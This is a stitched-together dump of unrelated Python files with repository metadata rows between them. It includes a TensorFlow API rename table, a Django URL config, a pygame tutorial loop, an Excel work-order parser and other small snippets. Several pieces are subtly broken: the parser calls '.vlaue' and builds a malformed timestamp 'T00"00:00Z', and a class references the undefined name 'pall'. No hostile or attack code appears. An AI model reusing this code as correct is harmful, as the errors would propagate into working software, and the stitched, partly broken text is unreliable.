"tf.contrib.data.CheckpointInputPipelineHook":
"tf.data.experimental.CheckpointInputPipelineHook",
"tf.contrib.data.CsvDataset":
"tf.data.experimental.CsvDataset",
"tf.contrib.data.Optional":
"tf.data.experimental.Optional",
"tf.contrib.data.RandomDataset":
"tf.data.experimental.RandomDataset",
"tf.contrib.data.Reducer":
"tf.data.experimental.Reducer",
"tf.contrib.data.SqlDataset":
"tf.data.experimental.SqlDataset",
"tf.contrib.data.StatsAggregator":
"tf.data.experimental.StatsAggregator",
"tf.contrib.data.TFRecordWriter":
"tf.data.experimental.TFRecordWriter",
"tf.contrib.data.assert_element_shape":
"tf.data.experimental.assert_element_shape",
"tf.contrib.data.bucket_by_sequence_length":
"tf.data.experimental.bucket_by_sequence_length",
"tf.contrib.data.choose_from_datasets":
"tf.data.experimental.choose_from_datasets",
"tf.contrib.data.copy_to_device":
"tf.data.experimental.copy_to_device",
"tf.contrib.data.dense_to_sparse_batch":
"tf.data.experimental.dense_to_sparse_batch",
"tf.contrib.data.enumerate_dataset":
"tf.data.experimental.enumerate_dataset",
"tf.contrib.data.get_next_as_optional":
"tf.data.experimental.get_next_as_optional",
"tf.contrib.data.get_single_element":
"tf.data.experimental.get_single_element",
"tf.contrib.data.group_by_reducer":
"tf.data.experimental.group_by_reducer",
"tf.contrib.data.group_by_window":
"tf.data.experimental.group_by_window",
"tf.contrib.data.ignore_errors":
"tf.data.experimental.ignore_errors",
"tf.contrib.data.latency_stats":
"tf.data.experimental.latency_stats",
"tf.contrib.data.make_batched_features_dataset":
"tf.data.experimental.make_batched_features_dataset",
"tf.contrib.data.make_csv_dataset":
"tf.data.experimental.make_csv_dataset",
"tf.contrib.data.make_saveable_from_iterator":
"tf.data.experimental.make_saveable_from_iterator",
"tf.contrib.data.map_and_batch":
"tf.data.experimental.map_and_batch",
"tf.contrib.data.parallel_interleave":
"tf.data.experimental.parallel_interleave",
"tf.contrib.data.parse_example_dataset":
"tf.data.experimental.parse_example_dataset",
"tf.contrib.data.prefetch_to_device":
"tf.data.experimental.prefetch_to_device",
"tf.contrib.data.rejection_resample":
"tf.data.experimental.rejection_resample",
"tf.contrib.data.sample_from_datasets":
"tf.data.experimental.sample_from_datasets",
"tf.contrib.data.scan":
"tf.data.experimental.scan",
"tf.contrib.data.set_stats_aggregator":
"tf.data.experimental.set_stats_aggregator",
"tf.contrib.data.shuffle_and_repeat":
"tf.data.experimental.shuffle_and_repeat",
"tf.contrib.data.unbatch":
"tf.data.experimental.unbatch",
"tf.contrib.data.unique":
"tf.data.experimental.unique",
"tf.contrib.distribute.CrossDeviceOps":
"tf.distribute.CrossDeviceOps",
"tf.contrib.distribute.ReductionToOneDeviceCrossDeviceOps":
"tf.distribute.ReductionToOneDevice",
"tf.contrib.estimator.make_early_stopping_hook":
"tf.estimator.experimental.make_early_stopping_hook",
"tf.contrib.estimator.stop_if_higher_hook":
"tf.estimator.experimental.stop_if_higher_hook",
"tf.contrib.estimator.stop_if_lower_hook":
"tf.estimator.experimental.stop_if_lower_hook",
"tf.contrib.estimator.stop_if_no_decrease_hook":
"tf.estimator.experimental.stop_if_no_decrease_hook",
"tf.contrib.estimator.stop_if_no_increase_hook":
"tf.estimator.experimental.stop_if_no_increase_hook",
"tf.contrib.framework.CriticalSection":
"tf.CriticalSection",
"tf.contrib.framework.is_tensor":
"tf.is_tensor",
"tf.contrib.framework.load_variable":
"tf.train.load_variable",
"tf.contrib.framework.nest.assert_same_structure":
"tf.nest.assert_same_structure",
"tf.contrib.framework.nest.flatten":
"tf.nest.flatten",
"tf.contrib.framework.nest.is_sequence":
"tf.nest.is_nested",
"tf.contrib.framework.nest.map_structure":
"tf.nest.map_structure",
"tf.contrib.framework.nest.pack_sequence_as":
"tf.nest.pack_sequence_as",
"tf.contrib.batching.batch_function":
"tf.nondifferentiable_batch_function",
"tf.contrib.util.constant_value":
"tf.get_static_value",
"tf.contrib.saved_model.load_keras_model":
"tf.keras.experimental.load_from_saved_model",
"tf.contrib.saved_model.save_keras_model":
"tf.keras.experimental.export_saved_model",
"tf.contrib.rnn.RNNCell":
"tf.compat.v1.nn.rnn_cell.RNNCell",
"tf.contrib.rnn.LSTMStateTuple":
"tf.nn.rnn_cell.LSTMStateTuple",
"tf.contrib.rnn.BasicLSTMCell":
"tf.compat.v1.nn.rnn_cell.BasicLSTMCell",
"tf.contrib.rnn.BasicRNNCell":
"tf.compat.v1.nn.rnn_cell.BasicRNNCell",
"tf.contrib.rnn.GRUCell":
"tf.compat.v1.nn.rnn_cell.GRUCell",
"tf.contrib.rnn.LSTMCell":
"tf.compat.v1.nn.rnn_cell.LSTMCell",
"tf.contrib.rnn.MultiRNNCell":
"tf.compat.v1.nn.rnn_cell.MultiRNNCell",
"tf.contrib.rnn.static_rnn":
"tf.compat.v1.nn.static_rnn",
"tf.contrib.rnn.static_state_saving_rnn":
"tf.compat.v1.nn.static_state_saving_rnn",
"tf.contrib.rnn.static_bidirectional_rnn":
"tf.compat.v1.nn.static_bidirectional_rnn",
"tf.contrib.framework.sort":
"tf.sort",
"tf.contrib.framework.argsort":
"tf.argsort",
"tf.contrib.summary.all_summary_ops":
"tf.compat.v1.summary.all_v2_summary_ops",
"tf.contrib.summary.always_record_summaries":
"tf.compat.v2.summary.record_if",
"tf.contrib.summary.audio":
"tf.compat.v2.summary.audio",
"tf.contrib.summary.create_file_writer":
"tf.compat.v2.summary.create_file_writer",
"tf.contrib.summary.flush":
"tf.compat.v2.summary.flush",
"tf.contrib.summary.generic":
"tf.compat.v2.summary.write",
"tf.contrib.summary.histogram":
"tf.compat.v2.summary.histogram",
"tf.contrib.summary.image":
"tf.compat.v2.summary.image",
"tf.contrib.summary.initialize":
"tf.compat.v1.summary.initialize",
"tf.contrib.summary.never_record_summaries":
"tf.compat.v2.summary.record_if",
"tf.contrib.summary.scalar":
"tf.compat.v2.summary.scalar",
"tf.contrib.tpu.CrossShardOptimizer":
"tf.compat.v1.tpu.CrossShardOptimizer",
"tf.contrib.tpu.InputPipelineConfig":
"tf.compat.v1.estimator.tpu.InputPipelineConfig",
"tf.contrib.tpu.RunConfig":
"tf.compat.v1.estimator.tpu.RunConfig",
"tf.contrib.tpu.TPUConfig":
"tf.compat.v1.estimator.tpu.TPUConfig",
"tf.contrib.tpu.TPUEstimator":
"tf.compat.v1.estimator.tpu.TPUEstimator",
"tf.contrib.tpu.TPUEstimatorSpec":
"tf.compat.v1.estimator.tpu.TPUEstimatorSpec",
"tf.contrib.tpu.batch_parallel":
"tf.compat.v1.tpu.batch_parallel",
"tf.contrib.tpu.bfloat16_scope":
"tf.compat.v1.tpu.bfloat16_scope",
"tf.contrib.tpu.core":
"tf.compat.v1.tpu.core",
"tf.contrib.tpu.cross_replica_sum":
"tf.compat.v1.tpu.cross_replica_sum",
"tf.contrib.tpu.initialize_system":
"tf.compat.v1.tpu.initialize_system",
"tf.contrib.tpu.outside_compilation":
"tf.compat.v1.tpu.outside_compilation",
"tf.contrib.tpu.replicate":
"tf.compat.v1.tpu.replicate",
"tf.contrib.tpu.rewrite":
"tf.compat.v1.tpu.rewrite",
"tf.contrib.tpu.shard":
"tf.compat.v1.tpu.shard",
"tf.contrib.tpu.shutdown_system":
"tf.compat.v1.tpu.shutdown_system",
"tf.contrib.training.checkpoints_iterator":
"tf.train.checkpoints_iterator",
"tf.contrib.layers.recompute_grad":
"tf.recompute_grad",
"tf.count_nonzero":
"tf.math.count_nonzero",
"tf.manip.batch_to_space_nd":
"tf.batch_to_space",
"tf.quantize_v2":
"tf.quantization.quantize",
"tf.sparse_add":
"tf.sparse.add",
"tf.sparse_concat":
"tf.sparse.concat",
"tf.sparse_split":
"tf.sparse.split",
"tf.sparse_matmul":
"tf.linalg.matmul",
"tf.sparse_reduce_sum":
"tf.sparse.reduce_sum",
"tf.sparse_reduce_max":
"tf.sparse.reduce_max",
"tf.random.stateless_multinomial":
"tf.random.stateless_categorical",
"tf.substr":
"tf.strings.substr",
# TODO(b/129398290)
"tf.string_split":
"tf.compat.v1.string_split",
"tf.string_to_hash_bucket":
"tf.strings.to_hash_bucket",
"tf.string_to_number":
"tf.strings.to_number",
"tf.multinomial":
"tf.random.categorical",
"tf.random.multinomial":
"tf.random.categorical",
"tf.reduce_join":
"tf.strings.reduce_join",
"tf.load_file_system_library":
"tf.load_library",
"tf.bincount":
"tf.math.bincount",
"tf.confusion_matrix":
"tf.math.confusion_matrix",
"tf.train.confusion_matrix":
"tf.math.confusion_matrix",
"tf.train.sdca_fprint":
"tf.raw_ops.SdcaFprint",
"tf.train.sdca_optimizer":
"tf.raw_ops.SdcaOptimizer",
"tf.train.sdca_shrink_l1":
"tf.raw_ops.SdcaShrinkL1",
"tf.decode_csv":
"tf.io.decode_csv",
"tf.data.Iterator":
"tf.compat.v1.data.Iterator",
"tf.data.experimental.DatasetStructure":
"tf.data.DatasetSpec",
"tf.data.experimental.OptionalStructure":
"tf.OptionalSpec",
"tf.data.experimental.RaggedTensorStructure":
"tf.RaggedTensorSpec",
"tf.data.experimental.SparseTensorStructure":
"tf.SparseTensorSpec",
"tf.data.experimental.Structure":
"tf.TypeSpec",
"tf.data.experimental.TensorArrayStructure":
"tf.TensorArraySpec",
"tf.data.experimental.TensorStructure":
"tf.TensorSpec",
"tf.parse_example":
"tf.io.parse_example",
"tf.parse_single_example":
"tf.io.parse_single_example",
"tf.nn.fused_batch_norm":
"tf.compat.v1.nn.fused_batch_norm",
"tf.nn.softmax_cross_entropy_with_logits_v2":
"tf.nn.softmax_cross_entropy_with_logits",
"tf.losses.Reduction.MEAN":
"tf.compat.v1.losses.Reduction.MEAN",
"tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS":
"tf.compat.v1.losses.Reduction.SUM_BY_NONZERO_WEIGHTS",
"tf.losses.Reduction.SUM_OVER_NONZERO_WEIGHTS":
"tf.compat.v1.losses.Reduction.SUM_OVER_NONZERO_WEIGHTS",
"tf.lite.constants.FLOAT":
"tf.float32",
"tf.lite.constants.INT32":
"tf.int32",
"tf.lite.constants.INT64":
"tf.int64",
"tf.lite.constants.STRING":
"tf.string",
"tf.lite.constants.QUANTIZED_UINT8":
"tf.uint8",
"tf.arg_max":
"tf.argmax",
"tf.arg_min":
"tf.argmin",
# tf.nn.ctc_loss is still available in 2.0 but behavior
# changed significantly.
"tf.nn.ctc_loss":
"tf.compat.v1.nn.ctc_loss",
# tf.saved_model.load in 1.x has no equivalent in 2.x, but there is a
# symbol with the same name.
"tf.saved_model.load":
"tf.compat.v1.saved_model.load",
"tf.saved_model.load_v2":
"tf.compat.v2.saved_model.load",
"tf.image.resize_images":
"tf.image.resize",
"tf.random_poisson":
"tf.random.poisson",
"tf.debugging.assert_greater":
"tf.compat.v1.debugging.assert_greater",
"tf.debugging.assert_greater_equal":
"tf.compat.v1.debugging.assert_greater_equal",
"tf.debugging.assert_integer":
"tf.compat.v1.debugging.assert_integer",
"tf.debugging.assert_less":
"tf.compat.v1.debugging.assert_less",
"tf.debugging.assert_less_equal":
"tf.compat.v1.debugging.assert_less_equal",
"tf.debugging.assert_near":
"tf.compat.v1.debugging.assert_near",
"tf.debugging.assert_negative":
"tf.compat.v1.debugging.assert_negative",
"tf.debugging.assert_non_negative":
"tf.compat.v1.debugging.assert_non_negative",
"tf.debugging.assert_non_positive":
"tf.compat.v1.debugging.assert_non_positive",
"tf.debugging.assert_none_equal":
"tf.compat.v1.debugging.assert_none_equal",
"tf.debugging.assert_type":
"tf.compat.v1.debugging.assert_type",
"tf.debugging.assert_positive":
"tf.compat.v1.debugging.assert_positive",
"tf.debugging.assert_equal":
"tf.compat.v1.debugging.assert_equal",
"tf.debugging.assert_scalar":
"tf.compat.v1.debugging.assert_scalar",
"tf.assert_equal":
"tf.compat.v1.assert_equal",
"tf.assert_less":
"tf.compat.v1.assert_less",
"tf.assert_greater":
"tf.compat.v1.assert_greater",
"tf.debugging.assert_rank":
"tf.compat.v1.debugging.assert_rank",
"tf.debugging.assert_rank_at_least":
"tf.compat.v1.debugging.assert_rank_at_least",
"tf.debugging.assert_rank_in":
"tf.compat.v1.debugging.assert_rank_in",
"tf.errors.exception_type_from_error_code":
"tf.compat.v1.errors.exception_type_from_error_code",
"tf.errors.error_code_from_exception_type":
"tf.compat.v1.errors.error_code_from_exception_type",
"tf.errors.raise_exception_on_not_ok_status":
"tf.compat.v1.errors.raise_exception_on_not_ok_status",
"tf.assert_rank":
"tf.compat.v1.assert_rank",
"tf.nn.max_pool":
"tf.nn.max_pool2d",
"tf.nn.avg_pool":
"tf.nn.avg_pool2d",
"tf.keras.initializers.zeros":
"tf.compat.v1.keras.initializers.zeros",
"tf.keras.initializers.Zeros":
"tf.compat.v1.keras.initializers.Zeros",
"tf.keras.initializers.ones":
"tf.compat.v1.keras.initializers.ones",
"tf.keras.initializers.Ones":
"tf.compat.v1.keras.initializers.Ones",
"tf.keras.initializers.constant":
"tf.compat.v1.keras.initializers.constant",
"tf.keras.initializers.Constant":
"tf.compat.v1.keras.initializers.Constant",
"tf.keras.initializers.VarianceScaling":
"tf.compat.v1.keras.initializers.VarianceScaling",
"tf.keras.initializers.Orthogonal":
"tf.compat.v1.keras.initializers.Orthogonal",
"tf.keras.initializers.orthogonal":
"tf.compat.v1.keras.initializers.orthogonal",
"tf.keras.initializers.Identity":
"tf.compat.v1.keras.initializers.Identity",
"tf.keras.initializers.identity":
"tf.compat.v1.keras.initializers.identity",
"tf.keras.initializers.glorot_uniform":
"tf.compat.v1.keras.initializers.glorot_uniform",
"tf.keras.initializers.glorot_normal":
"tf.compat.v1.keras.initializers.glorot_normal",
"tf.keras.initializers.lecun_normal":
"tf.compat.v1.keras.initializers.lecun_normal",
"tf.keras.initializers.lecun_uniform":
"tf.compat.v1.keras.initializers.lecun_uniform",
"tf.keras.initializers.he_normal":
"tf.compat.v1.keras.initializers.he_normal",
"tf.keras.initializers.he_uniform":
"tf.compat.v1.keras.initializers.he_uniform",
"tf.keras.initializers.TruncatedNormal":
"tf.compat.v1.keras.initializers.TruncatedNormal",
"tf.keras.initializers.truncated_normal":
"tf.compat.v1.keras.initializers.truncated_normal",
"tf.keras.initializers.RandomUniform":
"tf.compat.v1.keras.initializers.RandomUniform",
"tf.keras.initializers.uniform":
"tf.compat.v1.keras.initializers.uniform",
"tf.keras.initializers.random_uniform":
"tf.compat.v1.keras.initializers.random_uniform",
"tf.keras.initializers.RandomNormal":
"tf.compat.v1.keras.initializers.RandomNormal",
"tf.keras.initializers.normal":
"tf.compat.v1.keras.initializers.normal",
"tf.keras.initializers.random_normal":
"tf.compat.v1.keras.initializers.random_normal",
"tf.zeros_initializer":
"tf.compat.v1.zeros_initializer",
"tf.initializers.zeros":
"tf.compat.v1.initializers.zeros",
"tf.ones_initializer":
"tf.compat.v1.ones_initializer",
"tf.initializers.ones":
"tf.compat.v1.initializers.ones",
"tf.constant_initializer":
"tf.compat.v1.constant_initializer",
"tf.initializers.constant":
"tf.compat.v1.initializers.constant",
"tf.random_uniform_initializer":
"tf.compat.v1.random_uniform_initializer",
"tf.initializers.random_uniform":
"tf.compat.v1.initializers.random_uniform",
"tf.random_normal_initializer":
"tf.compat.v1.random_normal_initializer",
"tf.initializers.random_normal":
"tf.compat.v1.initializers.random_normal",
"tf.truncated_normal_initializer":
"tf.compat.v1.truncated_normal_initializer",
"tf.initializers.truncated_normal":
"tf.compat.v1.initializers.truncated_normal",
"tf.variance_scaling_initializer":
"tf.compat.v1.variance_scaling_initializer",
"tf.initializers.variance_scaling":
"tf.compat.v1.initializers.variance_scaling",
"tf.orthogonal_initializer":
"tf.compat.v1.orthogonal_initializer",
"tf.initializers.orthogonal":
"tf.compat.v1.initializers.orthogonal",
"tf.glorot_uniform_initializer":
"tf.compat.v1.glorot_uniform_initializer",
"tf.initializers.glorot_uniform":
"tf.compat.v1.initializers.glorot_uniform",
"tf.glorot_normal_initializer":
"tf.compat.v1.glorot_normal_initializer",
"tf.initializers.glorot_normal":
"tf.compat.v1.initializers.glorot_normal",
"tf.initializers.identity":
"tf.compat.v1.initializers.identity",
"tf.initializers.lecun_normal":
"tf.compat.v1.initializers.lecun_normal",
"tf.initializers.lecun_uniform":
"tf.compat.v1.initializers.lecun_uniform",
"tf.initializers.he_normal":
"tf.compat.v1.initializers.he_normal",
"tf.initializers.he_uniform":
"tf.compat.v1.initializers.he_uniform",
"tf.data.experimental.map_and_batch_with_legacy_function":
"tf.compat.v1.data.experimental.map_and_batch_with_legacy_function",
"tf.nn.conv2d_backprop_input":
"tf.nn.conv2d_transpose",
"tf.test.compute_gradient":
"tf.compat.v1.test.compute_gradient",
"tf.floor_div":
"tf.math.floordiv",
"tf.where":
"tf.compat.v1.where",
"tf.where_v2":
"tf.compat.v2.where",
}
# pylint: enable=line-too-long
symbol_renames = renames_v2.renames
symbol_renames.update(manual_symbol_renames)
addons_symbol_mappings = {
"tf.contrib.layers.poincare_normalize":
"tfa.layers.PoincareNormalize",
"tf.contrib.layers.maxout":
"tfa.layers.Maxout",
"tf.contrib.layers.group_norm":
"tfa.layers.GroupNormalization",
"tf.contrib.layers.instance_norm":
"tfa.layers.InstanceNormalization",
"tf.contrib.sparsemax.sparsemax":
"tfa.activations.sparsemax",
"tf.contrib.losses.metric_learning.contrastive_loss":
"tfa.losses.ContrastiveLoss",
"tf.contrib.losses.metric_learning.lifted_struct_loss":
"tfa.losses.LiftedStructLoss",
"tf.contrib.sparsemax.sparsemax_loss":
"tfa.losses.SparsemaxLoss",
"tf.contrib.losses.metric_learning.triplet_semihard_loss":
"tfa.losses.TripletSemiHardLoss",
"tf.contrib.opt.LazyAdamOptimizer":
"tfa.optimizers.LazyAdam",
"tf.contrib.opt.MovingAverageOptimizer":
"tfa.optimizers.MovingAverage",
"tf.contrib.opt.MomentumWOptimizer":
"tfa.optimizers.SGDW",
"tf.contrib.opt.AdamWOptimizer":
"tfa.optimizers.AdamW",
"tf.contrib.opt.extend_with_decoupled_weight_decay":
"tfa.optimizers.extend_with_decoupled_weight_decay",
"tf.contrib.text.skip_gram_sample":
"tfa.text.skip_gram_sample",
"tf.contrib.text.skip_gram_sample_with_text_vocab":
"tfa.text.skip_gram_sample_with_text_vocab",
"tf.contrib.image.dense_image_warp":
"tfa.image.dense_image_warp",
"tf.contrib.image.adjust_hsv_in_yiq":
"tfa.image.adjust_hsv_in_yiq",
"tf.contrib.image.compose_transforms":
"tfa.image.compose_transforms",
"tf.contrib.image.random_hsv_in_yiq":
"tfa.image.random_hsv_in_yiq",
"tf.contrib.image.angles_to_projective_transforms":
"tfa.image.angles_to_projective_transforms",
"tf.contrib.image.matrices_to_flat_transforms":
"tfa.image.matricies_to_flat_transforms",
"tf.contrib.image.rotate":
"tfa.image.rotate",
"tf.contrib.image.transform":
"tfa.image.transform",
"tf.contrib.rnn.NASCell":
"tfa.rnn.NASCell",
"tf.contrib.rnn.LayerNormBasicLSTMCell":
"tfa.rnn.LayerNormLSTMCell"
}
| [
"[email protected]"
] | |
9e1d8e2de437c05c4bfb0801655ea47bebb855fb | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_palls.py | dbff538f21fd450bb0e9c7a702715178521cdfad | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
#calss header
class _PALLS():
def __init__(self,):
self.name = "PALLS"
self.definitions = pall
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['pall']
| [
"[email protected]"
] | |
3498868b0b750bda0169ecc70e6676ab407c13b9 | e2f4cbbde6cd6f169a5ac36a5ae050d89f895158 | /Python_Workspace/Modules/package1/mod2.py | ebb9da7375c3d08a03d56eee659d36357caa8574 | [] | no_license | shubhamkumar1739/Linux_Workshop | 7a8511eebb049d6a0518bd1c8101038bc6b0e4e9 | c22e51943f012981165c41a76cea50b142bf3d77 | refs/heads/master | 2020-03-30T13:03:12.525964 | 2018-10-06T03:34:58 | 2018-10-06T03:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11 | py | var1_m2=77
| [
"[email protected]"
] | |
3f395841d95506c7c4b11095f96b073ae8043dea | b5a7c9ae13c81d655c176ceb0b8a73b4399cbf7a | /practico_02/ejercicio_01.py | 847b669e2c61394631d2e994bc0d7f2731006427 | [
"MIT"
] | permissive | ELC/TUPPython | 7459f4af5eb0306da1a61fd1e175ca4a68e5ac46 | 0115ece1dfdd599626f1cdeb410245fbee2aa4f8 | refs/heads/master | 2023-06-07T21:03:12.151001 | 2021-03-17T22:31:51 | 2021-03-17T22:31:51 | 338,466,855 | 1 | 1 | MIT | 2021-02-28T02:48:20 | 2021-02-13T00:36:50 | Python | UTF-8 | Python | false | false | 856 | py | """Módulos
Antes de realizar este TP, se recomienda ver el siguiente video:
https://youtu.be/A47sszUdTsM
En este archivo se deben importar los módulos:
- main.py as main
- source/util.py as util
- source/controller/controller.py as controller
Los imports deben hacerse de forma tal que funcionen con TODAS las formas
posibles de invocación (estando parados en la carpeta practico_02):
$PATH$/practico_02> python ejercicio_01.py
$PATH$/practico_02> python -m ejercicio_01
Referencia: https://docs.python.org/3/reference/import.html#the-import-system
"""
import main
import source.util as util
import source.controller.controller as controller
# NO MODIFICAR - INICIO
assert main.name == "main"
assert util.name == "util"
assert controller.name == "controller"
# NO MODIFICAR - FIN
# El siguiente ejercicio se encuentra en source/ejercicio_02.py
| [
"[email protected]"
] | |
1719fe5138986b05ab207d3c7b30490116f74c96 | e980e13bd0d264b3880705fb53a795a89fb5cfe6 | /sales_order/repair_order.py | f6ba01e2762bf878cdbc8480aa7f1e1f9f8ddf80 | [] | no_license | qianpeng-shen/u8 | 8e430ccab5390254b6660cbd047fc2ac495a04ca | 7fd28399dbf921826c1ef024800994412ab1b623 | refs/heads/master | 2020-05-13T20:28:16.764800 | 2019-04-16T09:29:58 | 2019-04-16T09:29:58 | 181,657,315 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,972 | py | # -*- coding:utf-8 -*-
#解析维修类维修工单数据
def analysis_repair(data):
repair_list = []
for repair in range(1,data.nrows):
repair_dict = {}
repair_dict['Status'] = data.cell(repair,1).value
repair_dict['UserID_ZDR'] = data.cell(repair,7).value
repair_dict['AdgoupID'] = data.cell(repair,8).value
repair_dict['UserID_KF'] = data.cell(repair,10).value
if data.cell(repair,11).vlaue:
if data.cell(repair,11).value == '网页表单':
repair_dict['CreateOrderChannel'] = '线上'
else:
repair_dict['CreateOrderChannel'] = '电话'
repair_dict['DetailContentMore'] = data.cell(repair,12).value
repair_dict['CallerNumber'] = data.cell(repair,13).value
repair_dict['UserName'] = data.cell(repair,20).value
repair_dict['ProvinceID'] = data.cell(repair,22).value
repair_dict['MunicipalityID'] = data.cell(repair,23).value
repair_dict['PrefectureID'] = data.cell(repair,24).value
repair_dict['Address_Detail'] = data.cell(repair,34).value
repair_dict['SN_GDXX'] = data.cell(repair,38).value
repair_dict['AppointmentTime'] = (data.cell(repair,40).value).replace('/','-') + 'T00"00:00Z'
repair_dict['WarrantyPeriod'] = data.cell(repair,41).value
if data.cell(repair,43).value:
malfunction = data.cell(repair,43).value
if ',' in malfunction:
repair_dict['Breakdown_PhenomenonID'] = malfunction.split(',')[1]
repair_dict['RelatedServiceProvider'] = data.cell(repair,46).value
repair_dict['ServiceProvidersNumber'] = data.cell(repair,48).value
repair_dict['ActivityContent'] = data.cell(repair,49).value
repair_dict['Reason'] = data.cell(repair,50).value
repair_dict['MailingAddress'] = data.cell(repair,52).value
repair_dict['ReturnToLogistics'] = data.cell(repair,53).value
| [
"[email protected]"
] | |
fbe657576a5f4817faee93631a0c29bd41fef7fd | 43461f999228079c9bfee03f0e4043f08426051f | /python_zero/飞机大战/hm_11_监听退出事件.py | ac165dcc7445e849fe8d415791911b793b4875e3 | [] | no_license | MapleStoryBoy/spider | f9af844ae9812fe21141060213ac2677e719ac73 | b014d81d52805f9317e85b66024d047e73d59053 | refs/heads/master | 2020-05-21T18:27:50.585790 | 2019-07-12T10:11:58 | 2019-07-12T10:11:58 | 186,132,575 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | import pygame
# 游戏的初始化
pygame.init()
# 创建游戏的窗口 480 * 700
screen = pygame.display.set_mode((480, 700))
# 绘制背景图像
bg = pygame.image.load("./images/background.png")
screen.blit(bg, (0, 0))
# pygame.display.update()
# 绘制英雄的飞机
hero = pygame.image.load("./images/me1.png")
screen.blit(hero, (150, 300))
# 可以在所有绘制工作完成之后,统一调用update方法
pygame.display.update()
# 创建时钟对象
clock = pygame.time.Clock()
# 1. 定义rect记录飞机的初始位置
hero_rect = pygame.Rect(150, 300, 102, 126)
# 游戏循环 -> 意味着游戏的正式开始!
while True:
# 可以指定循环体内部的代码执行的频率
clock.tick(60)
# 监听事件
for event in pygame.event.get():
# 判断事件类型是否是退出事件
if event.type == pygame.QUIT:
print("游戏退出...")
# quit 卸载所有的模块
pygame.quit()
# exit() 直接终止当前正在执行的程序
exit()
# 2. 修改飞机的位置
hero_rect.y -= 1
# 判断飞机的位置
if hero_rect.y <= 0:
hero_rect.y = 700
# 3. 调用blit方法绘制图像
screen.blit(bg, (0, 0))
screen.blit(hero, hero_rect)
# 4. 调用update方法更新显示
pygame.display.update()
pygame.quit()
| [
"[email protected]"
] | |
db4bc9a1b1db2b8a2081ccbfc57774f296f255e9 | 1f9e643698f683e77ed5f253cafda776b204f5d2 | /backend/franchise_guru_4345/urls.py | 5f0e09df865079b377bc64581a60b6f4c1dedb06 | [] | no_license | crowdbotics-apps/franchise-guru-4345 | ca907aaed1618abd5828ce20c108a90f01f09af7 | 53712fe881aa94579121e1c7384ab3e039fccd9d | refs/heads/master | 2022-12-12T06:50:11.577025 | 2019-06-06T20:54:46 | 2019-06-06T20:54:46 | 190,648,540 | 0 | 0 | null | 2022-12-06T16:07:16 | 2019-06-06T20:54:42 | JavaScript | UTF-8 | Python | false | false | 1,074 | py | """franchise_guru_4345 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url('', include('home.urls')),
url(r'^accounts/', include('allauth.urls')),
url(r'^api/v1/', include('home.api.v1.urls')),
url(r'^admin/', admin.site.urls),
]
admin.site.site_header = 'Franchise Guru'
admin.site.site_title = 'Franchise Guru Admin Portal'
admin.site.index_title = 'Franchise Guru Admin'
| [
"[email protected]"
] | |
4fed6cdfbfd5f2a72de1850169ab92171fcb5f2b | ded46c3a86c2a70328a63d779ac038d636ae5906 | /_WSpython/Pandas06_04_GroupByChkPop_최임정.py | 25b7e2d0123dcbc8d13c20046ed655462fdfe522 | [] | no_license | imjoung/hongik_univ | 82d0e7ea31763713f51bbde9d45e4aae5cb73849 | 82a3a77605d74d13eb76b915b215f6e245968180 | refs/heads/main | 2023-06-24T12:49:46.087083 | 2021-07-15T06:31:57 | 2021-07-15T06:31:57 | 379,128,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
# coding: utf-8
# In[19]:
import pandas as pd
df=pd.read_csv('../data/gapminder.tsv','\t')
# In[20]:
uniqueList=df['year'].unique()
for idx in uniqueList:
yearList=df[df['year'] == idx]
print(yearList['pop'].mean())
| [
"[email protected]"
] | |
3401ca65f75073dbe9b340ead4558693cb3b86eb | 1605c2db57cabfce9d146e891b22e38b85c37035 | /docs/reference/actions.py | d30f816795f6bc57107f80a8fc893396be519c45 | [
"Apache-2.0"
] | permissive | sylvielamythepaut/climetlab | 22499475e2220021145f4f6c84f6526a19d43ba4 | 59516b8a510ad506a12ad32bea9e8b98bdb9abf3 | refs/heads/master | 2022-12-21T11:51:41.243440 | 2020-09-18T07:42:45 | 2020-09-18T07:42:45 | 296,547,196 | 0 | 0 | Apache-2.0 | 2020-09-18T07:42:46 | 2020-09-18T07:30:00 | null | UTF-8 | Python | false | false | 10,710 | py | import inspect
from typing import List
from Magics import macro
def _given_args(frame):
func = frame.f_globals[frame.f_code.co_name]
user_args = inspect.getargvalues(frame)
code_args = inspect.getfullargspec(func)
given = {}
if code_args.kwonlydefaults:
pairs = list(code_args.kwonlydefaults.items())
else:
pairs = list(zip(code_args.args, code_args.defaults))
for name, value in pairs:
if user_args.locals[name] is not value:
given[name] = user_args.locals[name]
return given
def mcoast(
*,
# [Coastlines] This action controls the plotting of coastlines, rivers, cities and country boundaries, as well as the latitude/longitude grid lines.
map_coastline_general_style: str = "",
map_coastline: bool = True,
map_grid: bool = True,
map_label: bool = True,
# [CoastPlotting]
map_coastline_resolution: str = "automatic",
map_coastline_land_shade: bool = False,
map_coastline_land_shade_colour: str = "green",
map_coastline_sea_shade: bool = False,
map_coastline_sea_shade_colour: str = "blue",
map_boundaries: bool = False,
map_cities: bool = False,
map_preview: bool = False,
map_rivers: str = False,
map_rivers_style: str = "solid",
map_rivers_colour: str = "blue",
map_rivers_thickness: int = 1,
map_user_layer: str = False,
map_user_layer_name: str = "",
map_user_layer_projection: str = "",
map_user_layer_style: str = "solid",
map_user_layer_colour: str = "blue",
